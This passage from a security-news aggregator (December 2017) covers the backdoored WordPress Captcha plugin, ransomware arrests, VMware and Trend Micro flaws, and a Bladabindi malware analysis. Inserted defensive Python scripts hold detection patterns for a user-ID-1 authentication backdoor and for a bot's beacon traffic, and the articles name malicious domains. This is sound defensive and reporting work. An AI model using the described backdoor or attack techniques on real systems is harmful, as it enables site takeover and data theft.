By digging deeper, Wordfence also discovered that both Wellingtons and Mason Soiza are linked to a Quint Group Limited. Stacy Wellington mentions working for Serpable, which is (or was previously) an SEO company and also “is an Introducer Appointed Representative of Quint Group Limited.”

“However, at this time, it’s unclear if either Charlotte or Stacy Wellington is the creator of the backdoor code we discovered in the Captcha plugin,” Wordfence notes.

Given the strong correlation between Stacy Wellington, simplywordpress[.]net, and heyrank[.]co[.]uk (another domain hosted on 195.154.179.176 and registered to the individual), the researchers suggest that wpdevmgr2678, the new owner of the Captcha plugin, could be Stacy Wellington.

Wordfence and the WordPress.org plugins team released a patched version of Captcha (v4.4.5) that no longer includes the backdoor. The automatic update mechanism was used to upgrade all backdoored versions (4.3.6 – 4.4.4) to the new one, and over 100,000 sites running the backdoored iterations were upgraded over the weekend.
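The advisory gives defenders three concrete indicators: the affected version range, the plugin-update.php file, and the simplywordpress[.]net update source. The following checker, an added example and not Wordfence's or WordPress.org's code, audits a plugin directory for all three plus the user-ID-1 cookie pattern the text describes; the directory layout (wp-content/plugins/captcha/captcha.php with a standard "Version:" header) and the sample tree are assumptions constructed here.

```python
"""Audit a WordPress 'captcha' plugin directory for the backdoor indicators.

Added example (not Wordfence's or WordPress.org's code). Assumes the plugin
lives in wp-content/plugins/captcha/ with the usual "Version:" header in
captcha.php; the sample tree built by build_sample_tree() is constructed.
"""
import os
import re
import tempfile

# Inclusive version range reported as backdoored in the advisory.
BACKDOORED_RANGE = ((4, 3, 6), (4, 4, 4))
BACKDOOR_FILE = "plugin-update.php"
UPDATE_HOST = "simplywordpress.net"
# Backdoor behaviour described in the text: a session for user ID 1 plus
# auth cookies. Matching this in a plugin is a heuristic, not proof.
USER1_SESSION = re.compile(r"wp_set_(auth_cookie|current_user)\s*\(\s*1\b")
VERSION_HEADER = re.compile(r"^\s*\*?\s*Version:\s*([\d.]+)", re.MULTILINE)


def parse_version(header_text):
    """Return the plugin header version as an int tuple, or None."""
    m = VERSION_HEADER.search(header_text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def in_backdoored_range(version):
    lo, hi = BACKDOORED_RANGE
    return lo <= version <= hi


def audit_plugin(plugin_dir):
    """Return a list of human-readable findings for one plugin directory."""
    findings = []
    main_file = os.path.join(plugin_dir, "captcha.php")
    if os.path.isfile(main_file):
        with open(main_file, encoding="utf-8", errors="replace") as fh:
            version = parse_version(fh.read())
        if version and in_backdoored_range(version):
            findings.append("version %s is in the backdoored range"
                            % ".".join(map(str, version)))
    if os.path.isfile(os.path.join(plugin_dir, BACKDOOR_FILE)):
        findings.append("%s present" % BACKDOOR_FILE)
    for root, _dirs, files in os.walk(plugin_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                body = fh.read()
            rel = os.path.relpath(path, plugin_dir)
            if UPDATE_HOST in body:
                findings.append("%s references %s" % (rel, UPDATE_HOST))
            if USER1_SESSION.search(body):
                findings.append("%s sets a session for user ID 1" % rel)
    return findings


def build_sample_tree():
    """Constructed sample: a backdoored-range install with the extra file."""
    base = tempfile.mkdtemp()
    plugin_dir = os.path.join(base, "wp-content", "plugins", "captcha")
    os.makedirs(plugin_dir)
    with open(os.path.join(plugin_dir, "captcha.php"), "w") as fh:
        fh.write("<?php\n/*\nPlugin Name: Captcha\nVersion: 4.4.3\n*/\n")
    with open(os.path.join(plugin_dir, BACKDOOR_FILE), "w") as fh:
        # Placeholder content only; a real sample would carry the backdoor.
        fh.write("<?php\n// update source: simplywordpress.net\n"
                 "// wp_set_auth_cookie( 1 );\n")
    return plugin_dir


if __name__ == "__main__":
    for finding in audit_plugin(build_sample_tree()):
        print("FINDING:", finding)
```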


Authorities Dismantle Ransomware Cybergang
21.12.2017 securityweek Ransomware
Five Romanian nationals suspected of being part of a cybercrime group focused on distributing ransomware were arrested last week as part of a global cybercrime crackdown operation.

Three of the individuals are suspected of spreading the CTB-Locker (Curve-Tor-Bitcoin Locker, also known as Critroni) ransomware, while the other two were arrested in a parallel ransomware investigation linked to the United States, Europol has revealed.

Called operation “Bakovia,” the joint investigation was carried out by Romanian Police (Service for Combating Cybercrime), the Romanian and Dutch public prosecutor’s office, the Dutch National Police (NHTCU), the UK’s National Crime Agency, the US FBI with the support of Europol’s European Cybercrime Centre (EC3), and the Joint Cybercrime Action Taskforce (J-CAT).

The Dutch High Tech Crime Unit and other authorities informed the Romanian authorities in early 2017 that a group of individuals was involved in sending spam messages that appeared to come from companies in countries such as Italy, the Netherlands and the UK.

The spam emails contained what appeared to be an archived invoice that would hide malware inside. As soon as the intended victim would open the attachment, the CTB-Locker ransomware would be dropped and the data on the system would start being encrypted.

First observed in 2014, CTB-Locker was among the first ransomware families to use the Tor network to hide its command and control (C&C) infrastructure. New variants of the ransomware were observed over time, and a “vaccine” was released for it last year.

Targeting systems running Windows versions from XP to 8, the malware can encrypt user’s files asymmetrically, making it difficult to decrypt without a key that the attackers would release only after a ransom was paid.

Two people in the same criminal group are also suspected of having been involved in the distribution of the Cerber ransomware and of having infected a large number of computers in the United States. An investigation into the Cerber ransomware infections is ongoing.

Although the two investigations were separate in the beginning, they were joined when authorities discovered that the same group was behind both. The two suspects in the Cerber investigation hadn’t been located at the time of the actions on CTB-Locker, but were arrested one day after the US authorities issued an international arrest warrant for them.

As part of the operation, investigators searched six houses in Romania and seized a large amount of hard drives, laptops, external storage devices, cryptocurrency mining devices, and numerous documents.

“The criminal group is being prosecuted for unauthorised computer access, serious hindering of a computer system, misuse of devices with the intent of committing cybercrimes and blackmail,” Europol says.

The suspects did not develop the malware themselves, but acquired it from specific developers as part of the Ransomware-as-a-service (RaaS) model. They would launch the infection campaigns and pay around 30% of the profits to the developers. Wide-spread among cybercriminals, this modus operandi provides even wannabe criminals with access to powerful malicious applications.

“Ransomware attacks are relatively easy to prevent if you maintain proper digital hygiene. This includes regularly backing up the data stored on your computer, keeping your systems up to date and installing robust antivirus software. Also, never open an attachment received from someone you don’t know or any odd looking link or email sent by a friend on social media, a company, online gaming partner, etc.,” Europol notes.

Ransomware victims are advised to refrain from paying the ransom, as it would not guarantee the safe recovery of the data.

“Today, a clear message has been sent—involvement in cybercrime is not zero risk. These ransomware families claimed many victims in Belgium, Italy, the Netherlands, and the United States, and the arrests of the actors behind them is a significant takedown operation,” Raj Samani, Chief Scientist at McAfee, the security firm involved in the takedown, told SecurityWeek in an emailed statement.


Facebook Launches New Anti-Phishing Feature
21.12.2017 securityweek Social
Facebook announced on Wednesday the introduction of a new security feature designed to help users check if the emails they receive are legitimate or if they have been sent by cybercriminals.

When it detects a suspicious login attempt or a password change, Facebook notifies users by sending them an email from the Facebookmail.com domain. Cybercriminals often try to spoof these emails in an effort to lure internauts to phishing or other malicious websites.

Users can now check if the email in their inbox really does come from Facebook by going to Settings -> Security and Login -> See recent emails from Facebook. Here they can see recent emails, including ones related to security and logins, and if the message from their inbox is not listed, it’s most likely fake.

Facebook phishing tool

“If you've checked this tool and determined that an email you received is fake, we encourage you to report it to phish@facebook.com, and if you believe your account has been compromised due to a phishing attempt, you may attempt to regain access to your account at: facebook.com/hacked,” said Scott Dickens, Product Manager with Facebook Account Integrity.

The new feature has apparently not been rolled out to all accounts so users who don’t immediately find it in the settings menu should check back in a few days.

The new feature comes just weeks after the social media giant’s founder and CEO, Mark Zuckerberg, claimed his company has prioritized security over profit.

“We're serious about preventing abuse on our platforms. We're investing so much in security that it will impact our profitability. Protecting our community is more important than maximizing our profits,” Zuckerberg said.

Facebook recently awarded researchers $100,000 for discovering a novel technique of detecting credential spear-phishing attacks in enterprise environments. The method combines a new anomaly scoring technique for ranking security alerts with features derived from the analysis of spear-phishing emails.


Windows Hello Face Recognition Tricked by Photo
21.12.2017 securityweek Safety
The facial recognition-based authentication system in Windows Hello has been bypassed by researchers using a printed photo, but the method does not work in the latest versions of Windows 10.

Windows Hello, a feature available in Windows 10, allows users to quickly and easily log into their devices using their face or fingerprints. The face authentication system uses near-infrared (IR) imaging and it’s advertised by Microsoft as “an enterprise-grade identity verification mechanism.”

Researchers have demonstrated on several occasions that face authentication can be bypassed, but some systems, such as Apple’s Face ID, are more difficult to bypass than others. In the case of Windows Hello, experts managed to bypass facial authentication using only a photograph of the legitimate user printed in a certain way.

Matthias Deeg and Philipp Buchegger of Germany-based penetration testing firm SySS managed to conduct successful attacks using low-resolution near-IR photos even with the “enhanced anti-spoofing” feature enabled, which should make it more difficult to trick the system.

“By using a modified printed photo of an authorized user, an unauthorized attacker is able to log in to or unlock a locked Windows 10 system as this spoofed authorized user,” the researchers said in an advisory. “Thus, by having access to a suitable photo of an authorized person (frontal face photo), Windows Hello face authentication can easily be bypassed with little effort, enabling unauthorized access to the Windows system.”

The attack was successfully replicated on Windows 10 versions 1511 and 1607 even with the “enhanced anti-spoofing” feature enabled. In newer versions of the operating system, such as 1703 and 1709, the method no longer works if the anti-spoofing mechanism is turned on.

However, the researchers highlighted that updating to newer versions of Windows 10 and enabling the anti-spoofing feature is not enough to block attacks. Users must also reconfigure Hello Face Authentication.


North Korea Denies Role in WannaCry Ransomware Attack
21.12.2017 securityweek BigBrothers
North Korea on Thursday denied US accusations it was behind the WannaCry global ransomware cyberattack, saying Washington was demonising it.

WannaCry infected some 300,000 computers in 150 nations in May, encrypting user files and demanding hundreds of dollars from their owners for the keys to get them back.

The White House this week blamed Pyongyang for it, adding its voice to several other countries that had already done so.

A spokesman for Pyongyang's foreign ministry said the US allegations were "absurd", adding: "As we have clearly stated on several occasions, we have nothing to do with cyber-attacks."

Washington had "ulterior" motives, the spokesman added according to the North's KCNA news agency.

"This move is a grave political provocation by the US aimed at inducing the international society into a confrontation against the DPRK by tarnishing the image of the dignified country and demonising it," he said.

North Korea is subject to multiple United Nations sanctions over its banned nuclear and ballistic missile programs, and tested its third ICBM last month.

Leader Kim Jong-Un declared his country had achieved full nuclear statehood, in a challenge to US President Donald Trump who responded with promises of "major sanctions".

According to experts North Korea's cyberwarfare targets have expanded from the political -- it was accused of hacking into Sony Pictures Entertainment in 2014 to take revenge for "The Interview", a satirical film that mocked Kim -- to the financial, as it seeks new sources of funding.

A South Korean cryptocurrency exchange shut down on Tuesday after losing 17 percent of its assets in a hacking -- its second cyberattack this year, with the North accused of involvement in the first.

Investigators are probing the possibility that Pyongyang was also behind Tuesday's incident, the Wall Street Journal and Bloomberg News reported.

The North is blamed for a massive $81 million cyber-heist from the Bangladesh Central Bank (BCB) in 2016, as well as the theft of $60 million from Taiwan's Far Eastern International Bank in October.

Pyongyang has angrily denied the accusations -- which it described as a "slander" against the authorities -- but analysts say the digital footprints left behind suggest otherwise.


Fake Bitcoin Wallet Apps Removed from Google Play
21.12.2017 securityweek Android
Three fake Bitcoin applications were recently removed from Google Play after researchers at mobile security firm Lookout discovered they were tricking users into sending funds to their developers.

The impressive increase in Bitcoin value over the past several months has stirred interest from individuals worldwide, including cybercriminals. The number of attacks involving the cryptocurrency has increased recently, and it appears that they moved to mobile as well.

Detected as PickBitPocket, the rogue applications in Google Play were designed in such a way that they provide the attacker’s Bitcoin address instead of the seller’s. The malicious programs registered a total of up to 20,000 downloads before Google removed them from the application storefront.

Basically, when attempting to buy goods or services from an Android device where a PickBitPocket wallet app is installed, the user ends up routing the Bitcoin payment to the attacker.

The three fake Bitcoin apps, Lookout reports, included Bitcoin mining, which had between 1,000 and 5,000 installs at the time it was removed, Blockchain Bitcoin Wallet – Fingerprint, which had between 5,000 and 10,000 installs, and Fast Bitcoin Wallet, with between 1,000 and 5,000 installs.

“As Bitcoin captures broader interest, this means more people may be purchasing the cryptocurrency, or looking for mobile wallets to store their coins. Individuals should be vigilant in choosing a secure wallet and should also have a security solution in place to identify malicious activity on their device,” Lookout concludes.


VMWare addressed severe Code Execution vulnerabilities in several products
21.12.2017 securityweek Vulnerability

VMware has released security updates to address four vulnerabilities in its ESXi, vCenter Server Appliance (vCSA), Workstation and Fusion products.
The flaws were addressed with the release of six patches for ESXi, version 12.5.8 of Workstation, version 8.5.9 of Fusion, and version 6.5 U1d of vCSA.

Some of the flaws could be exploited by an attacker for arbitrary code execution.

Security experts from the Cisco Talos group discovered two of the code execution vulnerabilities and rated them as critical with a CVSS score of 9.0, while VMware classified them as having “important” severity. The flaws analyzed by Talos affect the VNC implementation that VMware products use to provide remote access.

“Today, Talos is disclosing a pair of vulnerabilities in the VNC implementation used in VMWare’s products that could result in code execution. VMWare implements VNC for its remote management, remote access, and automation purposes in VMWare products including Workstation, Player, and ESXi which share a common VMW VNC code base. The vulnerabilities manifest themselves in a way that would allow an attacker to initiate a VNC session causing the vulnerabilities to be triggered,” reads the security advisory published by Cisco.

The vulnerability CVE-2017-4941 resides in the remote management functionality of VMware; it could be exploited by a remote attacker to execute code in a virtual machine via an authenticated virtual network computing (VNC) session.

“A specially crafted set of VNC packets can cause a type confusion resulting in stack overwrite, which could lead to code execution.” reads the advisory published by Cisco Talos.

The second issue discovered by Cisco Talos is a heap overflow bug tracked as CVE-2017-4933 that could be triggered by an attacker to execute arbitrary code in a virtual machine using specially crafted VNC packets.

“An exploitable code execution vulnerability exists in the remote management functionality of VMware. A specially crafted set of VNC packets can cause a heap overflow resulting in heap corruption. An attacker can create a VNC session to trigger this vulnerability,” states Cisco Talos in the security advisory.

VMware hasn’t classified the flaws as critical because it argued that their exploitation is possible in ESXi only if VNC is manually enabled in the VM’s configuration file and the application is set to allow VNC traffic through the built-in firewall.
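Because VMware's severity rating hinges on VNC being enabled in the guest's configuration file, the first thing an ESXi administrator wants is an inventory of which .vmx files turn it on. The script below is an added example, not VMware's or Cisco Talos's code; it parses the flat key = "value" .vmx format and reports the RemoteDisplay.vnc.enabled, RemoteDisplay.vnc.port and password settings (the keys VMware uses for the guest VNC server), with the two sample .vmx texts constructed here.

```python
"""Inventory VMware guests whose .vmx file enables the built-in VNC server.

Added example (not VMware's or Cisco Talos's code). .vmx files are flat
key = "value" lines; the RemoteDisplay.vnc.* keys are the ones VMware uses
for the per-VM VNC server the Talos advisories concern. The two sample
configurations below are constructed, not taken from a real host.
"""
import re

VMX_LINE = re.compile(r'^\s*([\w.:-]+)\s*=\s*"(.*)"\s*$')

# Constructed sample: VNC manually enabled, which is the exposed condition.
SAMPLE_EXPOSED = '''
.encoding = "UTF-8"
config.version = "8"
displayName = "build-agent-01"
RemoteDisplay.vnc.enabled = "TRUE"
RemoteDisplay.vnc.port = "5901"
# no RemoteDisplay.vnc.password line: unauthenticated VNC
'''

# Constructed sample: default configuration, VNC left off.
SAMPLE_SAFE = '''
.encoding = "UTF-8"
config.version = "8"
displayName = "web-frontend-02"
RemoteDisplay.vnc.enabled = "FALSE"
'''


def parse_vmx(text):
    """Return {lower-cased key: value}; comments and blank lines are skipped."""
    cfg = {}
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = VMX_LINE.match(line)
        if m:
            cfg[m.group(1).lower()] = m.group(2)
    return cfg


def vnc_exposure(cfg):
    """Summarise the VNC settings relevant to CVE-2017-4941 / CVE-2017-4933."""
    enabled = cfg.get("remotedisplay.vnc.enabled", "FALSE").upper() == "TRUE"
    has_secret = bool(cfg.get("remotedisplay.vnc.password")
                      or cfg.get("remotedisplay.vnc.key"))
    return {
        "name": cfg.get("displayname", "<unnamed>"),
        "vnc_enabled": enabled,
        "port": cfg.get("remotedisplay.vnc.port"),
        "password_set": has_secret,
    }


def audit(vmx_texts):
    """Return exposure summaries for every configuration that enables VNC."""
    return [r for r in (vnc_exposure(parse_vmx(t)) for t in vmx_texts)
            if r["vnc_enabled"]]


if __name__ == "__main__":
    for result in audit([SAMPLE_EXPOSED, SAMPLE_SAFE]):
        print("VNC enabled on %(name)s port %(port)s, password set: "
              "%(password_set)s" % result)
```

A VM that shows up here is only reachable if the host firewall also passes VNC traffic, which is the second condition VMware cites; the .vmx check identifies the guests worth reviewing first.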


VMware also patched a stored cross-site scripting (XSS) flaw, tracked as CVE-2017-4940, affecting the ESXi Host Client; the issue could be exploited to inject code that gets executed when users access the Host Client. The company credited Alain Homewood of Insomnia Security for its discovery.

The fourth flaw addressed by VMWare is a privilege escalation affecting vCSA that is tracked as CVE-2017-4943. The vulnerability was discovered by Lukasz Plonka and resides in the showlog plugin, it could be exploited by an attacker with low privileges to obtain root level access to the appliance’s base operating system.


Operation Bakovia – Romanian authorities arrest 5 individuals for Spreading CTB Locker and Cerber Ransomware
21.12.2017 securityweek Ransomware

Operation Bakovia – Romanian police arrested 5 individuals suspected of infecting tens of thousands of computers across Europe and the US with Ransomware.
Another success of law enforcement against cybercrime, this time Romanian police have arrested five individuals suspected of infecting tens of thousands of computers across Europe and the United States with Ransomware.
The arrests are part of an international operation tracked as Operation Bakovia, conducted by Europol, the FBI and law enforcement agencies from Romania, the Netherlands and the UK.
The suspects were arrested for spreading the dreaded Cerber and CTB Locker (Curve-Tor-Bitcoin Locker) ransomware; the police also raided six houses in East Romania last week.
Three suspects were arrested in Romania, while the remaining two men, belonging to the same organization, were arrested in Bucharest as part of a parallel investigation conducted with the help of US authorities.

“During the last week, Romanian authorities have arrested three individuals who are suspected of infecting computer systems by spreading the CTB-Locker (Curve-Tor-Bitcoin Locker) malware – a form of file-encrypting ransomware. Two other suspects from the same criminal group were arrested in Bucharest in a parallel ransomware investigation linked to the US.” states the announcement published by Europol.

“During this law enforcement operation called “Bakovia“, six houses were searched in Romania as a result of a joint investigation carried out by the Romanian Police (Service for Combating Cybercrime), the Romanian and Dutch public prosecutor’s office, the Dutch National Police (NHTCU), the UK’s National Crime Agency, the US FBI with the support of Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT).”

As a result of the investigation, during the raid, the police seized a significant amount of hard drives, external storage, laptops, cryptocurrency mining devices, numerous documents and hundreds of SIM cards.

The suspects are being prosecuted for unauthorized computer access, serious hindering of a computer system, misuse of devices with the intent of committing cybercrimes and blackmail.

The Europol published a video of the arrests that shows the police’s incursion in the suspects’ residence.

CTB Locker, aka Critroni, is based on CryptoLocker; it was the first ransomware to use the Tor anonymizing network to hide its command and control infrastructure.

The Cerber ransomware was first spotted in 2016; it was offered in the criminal underground as a ransomware-as-a-service (RaaS).

“The investigation in this case revealed that the suspects did not develop the malware themselves, but acquired it from specific developers before launching various infection campaigns of their own, having to pay in return around 30% of the profit.” continues the Europol.

“This modus operandi is called an affiliation program and is “Ransomware-as-a-service”, representing a form of cybercrime used by criminals mainly on the Dark Web, where criminal tools and services like ransomware are made available by criminals to people with little knowledge of cyber matters, circumventing the need for expert technological skills.”

The CTB Locker was the most widespread ransomware in 2016, while Cerber was one of the most profitable ransomware in the criminal ecosystem.

Both ransomware families were spread through drive-by-download attacks and phishing campaigns.

“In early 2017, the Romanian authorities received detailed information from the Dutch High Tech Crime Unit and other authorities that a group of Romanian nationals was involved in sending spam messages,” Europol said in its press release. “The spam messages intended to infect computer systems and encrypt their data with the CTB-Locker ransomware aka Critroni. Each email had an attachment, often in the form of an archived invoice, which contained a malicious file. Once this attachment was opened on a Windows system, the malware encrypted files on the infected device.”

At the time the press release was published, the police had not yet released the identities of the arrested individuals.


Exclusive, CSE CybSec ZLAB Malware Analysis Report: The Bladabindi malware
21.12.2017 securityweek Virus

The CSE CybSec Z-Lab Malware Lab analyzed a couple of new malware samples, belonging to the Bladabindi family, that were discovered on a legitimate-looking website.
The ZLab team detected two new threats hosted on the legitimate-looking website www[.]6th-sense[.]eu. Both samples pose as a legitimate app that users have to install in order to access the media files hosted on the website.

Figure 1 – Homepage of the malicious website

The malicious website (www[.]6th-sense[.]eu), hosts 2 different malware samples:

“6thClient.exe” can be downloaded clicking the pop-up button on the homepage inviting users to download the client indicated on the screen.
“Firefox.exe” is hosted on the path “www[.]6th-sense[.]eu/Firefox.exe”
Both samples act as spyware; in particular, “Firefox.exe” seems to act as a bot, because it waits for specific commands from a C&C.

Analyzing the TCP stream, we can see the communication session performed by malware with the C&C:


The first row shows the PC’s name, the user’s name, and the OS version.
There are two recurrent words: “nyan” and “act”.
The first word is a separator between the pieces of information sent to the C&C.
The second one is the category of the information sent by the bot; in this case it is the ‘action’ performed by the host, specifically the name of the window in the foreground.
In the middle, we can see some strings encoded in Base64. These strings represent the title of the foreground window.
The C&C acknowledges the report by sending the number zero to the bot; this value probably indicates that there are no commands to execute on the host.
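A decoder for the beacon format just described makes a handy network-detection helper: split on the “nyan” separator, pick out the “act” category token, and Base64-decode whatever decodes to printable text. The block below is an added example, not code from the ZLab report; the field order and the sample stream are constructed from the page's description, not captured traffic.

```python
"""Decode a Bladabindi-style bot beacon as described in the ZLab report.

Added example (not the ZLab team's code). Format taken from the page:
fields separated by "nyan", an "act" token marking a foreground-window
report, Base64-encoded window titles, and a "0" reply from the C&C meaning
no pending command. SAMPLE_BEACON is constructed, not captured.
"""
import base64
import binascii
import re

SEPARATOR = "nyan"
CATEGORY_TOKENS = {"act"}          # only the category seen on the page
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed beacon: host name, user, OS version, then an "act" report
# carrying the Base64-encoded title of the foreground window.
SAMPLE_BEACON = (" " + SEPARATOR + " ").join([
    "DESKTOP-TEST", "analyst", "Windows 7 Professional", "act",
    base64.b64encode(b"Document1 - Microsoft Word").decode("ascii"),
])


def try_b64(field):
    """Return the decoded text if field is Base64 of printable UTF-8, else None."""
    if not field or len(field) % 4 or not B64_SHAPE.match(field):
        return None
    try:
        raw = base64.b64decode(field, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def decode_beacon(line):
    """Split one bot-to-C&C line into category, plain fields and decoded titles."""
    result = {"category": None, "plain": [], "decoded": []}
    for field in (f.strip() for f in line.split(SEPARATOR)):
        if field in CATEGORY_TOKENS:
            result["category"] = field
            continue
        decoded = try_b64(field)
        if decoded is None:
            result["plain"].append(field)
        else:
            result["decoded"].append(decoded)
    return result


def looks_like_bladabindi(line):
    """Detection heuristic: separator + category token + a decodable title."""
    if SEPARATOR not in line:
        return False
    parsed = decode_beacon(line)
    return parsed["category"] is not None and bool(parsed["decoded"])


def is_idle_reply(reply):
    """The C&C answers "0" when it has no command for the bot."""
    return reply.strip() == "0"


if __name__ == "__main__":
    parsed = decode_beacon(SAMPLE_BEACON)
    print("host fields:", parsed["plain"])
    print("category:", parsed["category"], "titles:", parsed["decoded"])
    print("idle reply:", is_idle_reply("0\r\n"))
```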

Both samples appear to belong to the Bladabindi malware family.

Bladabindi is a Trojan that steals confidential information from the compromised computer. Attackers also use it as a malware downloader to deliver and execute other malware. With this malware, cybercriminals could steal:

Your computer name
Your native country
OS serial numbers
Windows usernames
Operating system version
Stored passwords in chrome
Stored passwords in Firefox
You can download the full ZLAB Malware Analysis Report at the following URL:

Malware Analysis Report: Bladabindi.Dec17


Facebook, WhatsApp Both Put Under Notice by Europe
20.12.2017 securityweek Social
The French privacy regulator, the National Commission of Computing and Freedoms (CNIL) has issued a formal notice on WhatsApp. It requires the Facebook company to stop personal data transfers to the parent company in the U.S. unless there is a legal basis for doing so. In particular, WhatsApp must obtain 'user consent' (within the meaning of European law) to gather and transfer that data.

It's a busy time for privacy issues between the U.S. and Europe. CNIL published its notice on Tuesday. On the same day, the powerful German competition authority, the Bundeskartellamt (the Federal Cartel Office or FCO), warned Facebook that it "is abusing [its] dominant position by making the use of its social network conditional on its being allowed to limitlessly amass every kind of data generated by using third-party websites."

Last week the European Commission filed an amicus curiae brief (PDF) with the United States Court of Appeals for the Second Circuit in the ongoing dispute between Microsoft and the U.S. government. Notably, this was in support of neither party, but was an attempt to ensure that the U.S. court has a full understanding of the relevant European law -- in this case, specifically the General Data Protection Regulation (GDPR).

The German FCO concern over Facebook is over the widespread collection of personal user data. In February 2017, the FCO declared that it would investigate Facebook. President Andreas Mundt said at the time, "Dominant companies are subject to special obligations. These include the use of adequate terms of service as far as these are relevant to the market. For advertising-financed internet services such as Facebook, user data are hugely important. For this reason it is essential to also examine under the aspect of abuse of market power whether the consumers are sufficiently informed about the type and extent of data collected."

Now the FCO has stated, "The authority holds the view that Facebook is abusing this dominant position by making the use of its social network conditional on its being allowed to limitlessly amass every kind of data generated by using third-party websites." At the heart of the concern is the inadequate informed consent of the user in allowing personal data collection. Facebook claims that it is not a dominant company in Europe (it has more than 30 million active monthly users in Germany); and that it complies with European law.

The concept of free and informed consent also underlies CNIL's notice against Facebook subsidiary, WhatsApp. In August 2016 WhatsApp changed its Terms of Service and Privacy Policy, explaining that in future, its user data would be transferred to Facebook for targeted advertising, security, and business intelligence. The European regulator grouping, known as Article 29 Working Party, quickly asked WhatsApp to stop the transfer of personal data for targeted advertising.

In a subsequent investigation, WhatsApp told CNIL that French personal data had never been used for targeted advertising. However, CNIL determined that personal data was shared for business intelligence and security. "Thus," says the CNIL statement, "information about users such as their phone number or their use habits on the application are shared." While sharing data for security is not an issue, sharing for business intelligence "is not based on the legal basis required by the Data Protection Act for any processing."

According to CNIL, any user consent to this data collection and sharing is neither free nor informed ("the only way to refuse the data transfer for 'business intelligence' purpose is to uninstall the application"). CNIL requested a sample of data that had been transferred, but this was refused by WhatsApp. The data concerned is now in the U.S., and WhatsApp apparently considers that it is only subject to the law of the U.S.

This refusal has been interpreted by CNIL as a breach of WhatsApp's obligation to cooperate with the regulator under Article 21 of the Data Protection Act. It has consequently issued the formal notice requiring WhatsApp to comply with the Data Protection Act within one month.

Neither the CNIL notice nor the FCO statement can directly lead to sanctions against Facebook/WhatsApp. They can best be viewed as shots across the bow, which -- if ignored -- could lead to the full cannon power of European data protection being leveled against Facebook. Both statements being issued on the same day is a remarkable coincidence. Coming exactly one week after the European Commission used the GDPR-relevant Microsoft vs U.S. government court struggle to make sure that U.S. courts understand Europe's point of view is also remarkable.

It could all be coincidence. But coincidence or not, Europe is warning the large American tech companies -- and indeed, any company that trades with or within Europe -- it is taking its data protection laws seriously. While existing sanctions could be funded out of the running costs of large companies, the potential for future GDPR sanctions of up to 4% of global turnover is not something that can be ignored. Any assumption that Europe will not be quick to enforce GDPR when it comes into force in May 2018 should be rejected.


White House Blames North Korea for Cyberattack
20.12.2017 securityweek BigBrothers
The White House on Tuesday publicly accused North Korea of launching a massive cyberattack that hit 150 countries last May -- hobbling networks from Britain's public health system to FedEx.

"After careful investigation, the United States is publicly attributing the massive 'WannaCry' cyberattack to North Korea," said White House homeland security advisor Tom Bossert.

"We do not make this allegation lightly, we do so with evidence and we do so with partners," he added.

Exploiting a security flaw in Microsoft's Windows XP operating system, the malware infected an estimated 300,000 computers demanding ransom to decrypt data.

The United States is the latest country to point the finger of blame at Pyongyang, attribution which comes as part of a drive to exert "maximum pressure" on the regime.

As yet, no retaliatory measures have been announced.

Among the infected computers were those at Britain's National Health Service (NHS), Spanish telecoms company Telefonica and US logistics company FedEx.

London had already blamed North Korea, which hit a third of Britain's public hospitals.

Pyongyang then denied the allegation, saying it went "beyond the limit of our tolerance" and was a "wicked attempt to lure the international community into harboring greater mistrust of the DPRK."

- US government under scrutiny -

Questions had been raised about whether the US government acted in a timely manner to respond to the attack, with Microsoft accusing Washington of spotting the flaw and using it for its own ends.

"This attack provides yet another example of why the stockpiling of vulnerabilities by governments is such a problem," Microsoft's Brad Smith said at the time.

"Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage," he said, accusing the National Security Agency of spotting the flaw and saying nothing.

Bossert said that the United States kept only 10 percent of security flaws secret and had no policy of "stockpiling" or withholding information from potential targets.

Since coming to office Donald Trump has sought to put pressure on North Korea, as its reclusive leaders edge ever-closer to developing a ballistic missile that could deliver a nuclear warhead to the United States.

Amid a series of tests Trump's administration has appeared at odds over whether talks could offer a way out of the standoff.

National Security Advisor HR McMaster tried to clean up that question in an interview with the BBC, saying the United States wanted a peaceful solution: "Of course that's what we want but we are not committed to a peaceful resolution."

"We are committed to a resolution, we want the resolution to be peaceful. But, as the president has said, all options are on the table and we have to be prepared if necessary to compel the denuclearization of North Korea without the cooperation of that regime."

Trump's first National Security Strategy, released Monday, declared that "North Korea seeks the capability to kill millions of Americans with nuclear weapons."

"Continued provocations by North Korea will prompt neighboring countries and the United States to further strengthen security bonds and take additional measures to protect themselves."


Code Execution Flaws Found in Trend Micro Smart Protection Server
20.12.2017 securityweek Vulnerability
Researchers at Core Security have discovered five vulnerabilities in Trend Micro’s Smart Protection Server product, including flaws that could have been exploited for remote code execution.

Smart Protection Server is a cloud-based protection solution that leverages file and web reputation technologies to detect security risks. The product’s administration interface was found to contain information exposure, improper authentication, improper control and improper filtering issues.

The vulnerabilities were reported to Trend Micro in early September and they were patched in mid-November with the release of version 3.3. The security firm has made available an advisory of its own for the flaws, which are tracked as CVE-2017-11398, CVE-2017-14094, CVE-2017-14095, CVE-2017-14096 and CVE-2017-14097. The vendor has rated only one of the issues as high severity, while the rest are medium severity.

One of the security holes is related to the fact that an attacker could have accessed diagnostic logs without authentication via HTTP. Accessing the log file can allow an attacker to obtain information needed to hijack active user sessions and perform authenticated requests.

Once authentication has been bypassed using the aforementioned flaw, an attacker could have exploited a weakness related to a PHP script that creates cron jobs when scheduling software updates. Core Security has released proof-of-concept (PoC) exploits that show how a hacker could have leveraged this vulnerability to execute arbitrary commands and open a reverse shell using specially crafted requests.

Researchers also found a local file inclusion vulnerability that can lead to remote command execution. This weakness is more difficult to exploit as the attacker needs to set up a fake update server and get the Trend Micro product to download a malicious file from it.

Successful exploitation results in a PHP script being written to the server. The attacker can then include the script using the file inclusion vulnerability and execute it.

In this case, escalating privileges to root is also possible, including via methods disclosed a few months ago by researchers Steven Seeley and Roberto Suggi Liverani, who reported identifying more than 200 vulnerabilities in Trend Micro products. Core Security said several of the privilege escalation vectors disclosed by the experts remain unpatched.

